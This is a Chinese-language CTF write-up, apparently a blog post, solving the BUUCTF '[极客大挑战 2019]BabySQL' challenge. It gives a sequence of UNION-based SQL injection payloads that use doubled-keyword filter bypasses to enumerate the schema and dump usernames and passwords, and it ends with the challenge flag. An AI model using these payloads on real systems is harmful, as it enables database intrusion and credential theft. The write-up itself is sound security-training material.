[极客大挑战 2019]BabySQL—3.20BUUCTF练习day4(3)

极客大挑战 2019BabySQL-3.20BUUCTF练习day4(3)

做题过程

打开是以下页面(前几天有它的第一版第二版出现)输入1'

回显以下内容(还是字符型以单引号闭合,因为有报错信息回显)
输入1' order by 4%23回显成这个
被过滤了

先不管列数看看

输入1' union select 1,2%23判断显示位在哪里
那就使用以下双写绕过

输入1' ununionion seselectlect 1,2%23双写绕过,判断显示位这里显示列数不相同,那么为什么会有这个报错呢

这是因为union 的特性

你要查询语句的字段数量必须要和服务端数据库的查询语句字段数量要一致(指的是union前后的select后面的数字(例如刚刚的查询语句中的1,2字段数是2因为在数据库查询字段数不同所以报错)

那就试一试
1' ununionion seselectlect 1,2,3%23

好啦✔回显正确,之后就使用双写绕过

现在知道了列数(字段数)也知道了回显位(将数据回显在客户端屏幕上的位置)

该查询库名和用户名

输入-1' ununionion seselectlect 1,database(),user()%23
根据联合查询,该查询表名了

输入-1' ununionion seselectlect 1,group_concat(table_name),3 from information_schema.tables where schema_name='geek'%23
修改为-1' ununionion seselectlect 1,group_concat(table_name),3 frfromom infoorrmation_schema.tables whewherere table_schema='geek'%23
我们查询b4bsql这个表里面的字段名

输入-1' ununionion seselectlect 1,group_concat(column_name),3 frfromom infoorrmation_schema.columns whewherere table_name='b4bsql'%23
查询字段内容

输入
-1' ununionion seselectlect 1,group_concat(id,0x3A,username,0x3A,password),3 frfromom b4bsql%23
那就再输入-1' ununionion seselectlect 1,group_concat(id,0x3A,username,0x3A,passwoorrd),3 frfromom b4bsql%23

得到flag
flag{0bbd78c4-ad10-4e17-92d7-72d0022bb992}

相关推荐
Alan_7521 分钟前
API 接口慢调用根因定位:从 TCP 建连到数据库 IO 的全栈排查实战
数据库
多巴胺梦想家1 小时前
事务与并发控制:当多人同时操作数据库
服务器·数据库·oracle
howard20052 小时前
PostgreSQL起步
数据库·postgresql
秋田君3 小时前
QT_QT布局详解
开发语言·数据库·qt
m0_738120723 小时前
PHP代码审计基础——超全局变量(三)
开发语言·安全·网络安全·php
可乐ea3 小时前
【Redis八股|第8篇】Redis 分布式锁原理与 Redisson 使用
数据库·redis·分布式·面试题·redis八股
李燚3 小时前
Eino devops 调试系统源码:GraphCompileCallback 怎么工作(第50篇-E36)
数据库·golang·agent·devops·graphql·aiagent·eino
ClouGence4 小时前
Oracle 到 OceanBase 迁移方案横评:停机导出/导入 vs OMS vs CDC 工具
数据库·oracle
Meya11274 小时前
不同规模机房怎么选 U 位系统?8 柜小型机房、40 柜数据中心完整选型参考
服务器·网络·数据库
m0_738120725 小时前
PHP代码审计基础——面向对象(四)
android·开发语言·网络·安全·github·php